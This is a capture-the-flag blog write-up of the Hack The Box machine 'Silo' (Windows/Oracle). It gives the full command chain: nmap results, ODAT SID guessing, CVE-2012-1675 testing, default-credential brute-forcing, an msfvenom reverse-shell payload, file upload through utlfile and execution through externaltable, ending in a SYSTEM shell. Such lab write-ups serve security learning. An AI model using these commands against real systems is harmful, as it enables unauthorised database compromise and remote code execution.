Silo (Windows/Oracle)
https://qwertty.info/blog/htb-silo-writeup
Nmap Scan Result
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2022-01-21T19:57:57
|_ start_date: 2022-01-21T19:45:43
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
http has a blank IIS page .
Run a gobuster\
and follow the steps.
We discovered the vulnerability of the box. No we have to search for an existing exploit or tool that we can use for our case. After a while I found the ODAT (Oracle Database Attacking Tool). In the
README.md I found a module for our CVE-2012-1675. So let's try this tool.First we have to clone the repo and change our directory to it:
$ git clone https://github.com/quentinhardy/odat.git
$ cd odat
Now we can try the
tnspoison module:$ python3 odat.py tnspoison -s 10.10.10.82 --test-module
07:43:54 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.
But we need the server
SID. Let's see how we can discover it.The help menu of
odat.py show's us a module sidguesser. I think this is what we need.$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
############################################################################################################### | ETA: 00:00:00
100% |###########################################################################################################| Time: 00:01:30
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ############################################################################## | ETA: 00:00:08
100% |###########################################################################################################| Time: 00:01:13
[+] SIDs found on the 10.10.10.82:1521 server: XE
And we got our SID:
XENow we can test again the
tnspoison module. I always try to verify the vulnerability before I ran into a rabbit hole.$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-modul
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
Yes, it works. In the help menu of
odat.py I saw the module passwordguesser. Maybe we can extract some credentials. Because we got the SID. This is mostly always required for the modules.$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
....
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
Awesome! We found some valid credentials. So maybe we are able to upload our reverse shell. There is a module named
utlfile. With this we can upload/download/delete files. But first we have to create our reverse shell.I will use
msfvenom for it:$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > qwertty.exe
Now we can
upload it with the odat.py$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file
Nice, the file was created on the box.
No let's start our
nc listener on port 4444$ nc -lvnp 4444
Now we can use the module
externaltable. It took me a while to discover this module because it is not an obvious name for what we was looking for. But the description says what we want:to read files or to execute system commands/scripts
Let's try it:
$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path
Hopefully we got the reverse shell. Let's check our
nc listener:$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>
Copy
Nice! We got the shell. Now we can grab the
user and root flag.
----
Odat installation
Initially, I couldn't convert the rpm to deb like the instruction and found this post here: https://askubuntu.com/questions/215624/alien-cannot-built-package-for-architecture-ubuntu-amd64
Last modified 1yr ago